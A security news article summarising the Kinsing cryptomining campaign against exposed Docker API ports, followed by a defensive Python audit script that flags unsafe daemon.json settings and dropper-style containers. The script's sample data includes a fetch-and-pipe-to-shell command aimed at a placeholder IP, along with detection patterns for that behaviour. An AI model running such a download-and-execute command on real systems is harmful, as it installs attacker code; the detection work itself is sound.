Kinsing Malware Actively Targeting Docker Servers With Exposed API Ports


Researchers have found a malware operation in the wild targeting Docker servers. Dubbed Kinsing, the malware is actively targeting Docker servers with exposed API ports.

Kinsing Malware Targeting Docker Servers

Reportedly, the security team at Aqua Security has found an active malware campaign targeting Docker servers. As elaborated in their blog post, the malware, dubbed Kinsing, is targeting Docker servers with exposed APIs in the wild. This allows the attackers to install cryptominers and to use the infected servers to spread the infection further.

As stated by the researchers,

The attackers exploit a misconfigured Docker API port to run an Ubuntu container with the kinsing malicious malware, which in turn runs a cryptominer and then attempts to spread the malware to other containers and hosts.

While the detailed technical analysis of the attack is available in the researchers' post, here is a brief summary.

The attack begins when the attackers detect an unprotected, open Docker API port. They then instantiate an Ubuntu container whose entry point downloads a shell script, d.sh, from one of three IP addresses under their control. This shell script performs various activities that facilitate the execution of the malware, and it also downloads and runs the Kinsing malware itself.

This malware has several C&C servers, each dedicated to a separate operation. Though the malware's main aim is to deploy a cryptominer (kdevtmpfsi), it also performs other activities, such as lateral movement to target other systems.

Infection Campaign Going Around For Months

According to Aqua, the Kinsing campaign has been active for months, targeting misconfigured, open Docker daemon API ports. The researchers observed thousands of such attempts almost every day.

Researchers advise companies to review their Docker instances and ensure that all API ports are secured. Exposed admin endpoints should be placed behind firewalls or VPNs and disabled when not in use.
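The two checks a defender would want after reading the attack summary and the advice above are (1) whether a Docker daemon is listening on a TCP port without TLS client verification, which is the "exposed API port" the campaign scans for, and (2) whether any running container was launched with an entry point that fetches a remote shell script and executes it, the pattern described for the Ubuntu dropper container. The script below is an added example, not tooling from Aqua Security or Docker. The `daemon.json` keys `hosts` and `tlsverify` are real Docker daemon options; the sample configurations, the container records (shaped like `docker inspect` output) and the IP address in them are constructed for the demonstration.

```python
"""Audit helpers for the two weaknesses discussed in the article:
1. a Docker daemon exposing its API on TCP without TLS client verification, and
2. containers whose launch command downloads and runs a remote shell script.

Added example, not Aqua's or Docker's own code. Sample inputs are constructed.
"""
import json
import re
from urllib.parse import urlsplit

# Constructed daemon.json documents: the weak setting and the hardened one.
EXPOSED_DAEMON_JSON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"],
})
HARDENED_DAEMON_JSON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://127.0.0.1:2376"],
    "tlsverify": True,
    "tlscacert": "/etc/docker/ca.pem",
    "tlscert": "/etc/docker/server-cert.pem",
    "tlskey": "/etc/docker/server-key.pem",
})


def daemon_api_findings(daemon_json: str) -> list:
    """Return human-readable findings for a daemon.json document.

    An empty list means no unauthenticated or wildcard-bound TCP listener was found.
    """
    cfg = json.loads(daemon_json)
    findings = []
    tls_enforced = bool(cfg.get("tlsverify"))
    for host in cfg.get("hosts", []):
        if not host.startswith("tcp://"):
            continue  # unix:// and fd:// listeners are reachable only locally
        bind_addr = urlsplit(host).hostname or ""
        if not tls_enforced:
            findings.append(f"{host}: TCP listener without tlsverify (unauthenticated API)")
        if bind_addr in ("", "0.0.0.0", "::"):
            findings.append(f"{host}: bound to all interfaces; restrict to loopback or a firewalled address")
    return findings


# Constructed 'docker inspect'-style records: one benign web server and one
# container launched the way the article describes (fetch a script, pipe it to sh).
# 198.51.100.23 is a documentation-range placeholder, not a real indicator.
SAMPLE_CONTAINERS = [
    {"Id": "aaa111", "Config": {"Image": "nginx:1.19",
                                "Entrypoint": ["/docker-entrypoint.sh"],
                                "Cmd": ["nginx", "-g", "daemon off;"]}},
    {"Id": "bbb222", "Config": {"Image": "ubuntu",
                                "Entrypoint": ["/bin/bash", "-c"],
                                "Cmd": ["curl -s http://198.51.100.23/d.sh | sh"]}},
]

# A download tool followed (before any pipe or separator) by an http(s) URL ...
REMOTE_FETCH = re.compile(r"\b(curl|wget)\b[^|;&]*https?://", re.IGNORECASE)
# ... whose output is piped into a shell or made executable and run.
EXEC_SINK = re.compile(r"\|\s*(ba)?sh\b|\bchmod\s+\+x\b|\bsh\s+\S+\.sh\b")


def suspicious_containers(records: list) -> list:
    """Return the Ids of containers whose entrypoint/cmd fetches and executes a remote script."""
    hits = []
    for rec in records:
        cfg = rec.get("Config", {})
        cmdline = " ".join((cfg.get("Entrypoint") or []) + (cfg.get("Cmd") or []))
        if REMOTE_FETCH.search(cmdline) and EXEC_SINK.search(cmdline):
            hits.append(rec["Id"])
    return hits


if __name__ == "__main__":
    for label, doc in (("exposed", EXPOSED_DAEMON_JSON), ("hardened", HARDENED_DAEMON_JSON)):
        print(f"{label} daemon.json:", daemon_api_findings(doc) or ["no findings"])
    print("containers matching the remote-script dropper pattern:",
          suspicious_containers(SAMPLE_CONTAINERS))
```

On a real host, feed `daemon_api_findings` the contents of `/etc/docker/daemon.json` and `suspicious_containers` the parsed output of `docker inspect $(docker ps -q)`. The hardened configuration shows the mitigation the researchers recommend in concrete form: no TCP listener on all interfaces, and TLS client verification on any listener that must stay reachable over the network.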

Let us know your thoughts in the comments.


Abeerah Hashim

Abeerah has been a passionate blogger for several years with a particular interest towards science and technology. She is crazy to know everything about the latest tech developments. Knowing and writing about cybersecurity, hacking, and spying has always enchanted her. When she is not writing, what else can be a better pastime than web surfing and staying updated about the tech world! Reach out to me at: [email protected]
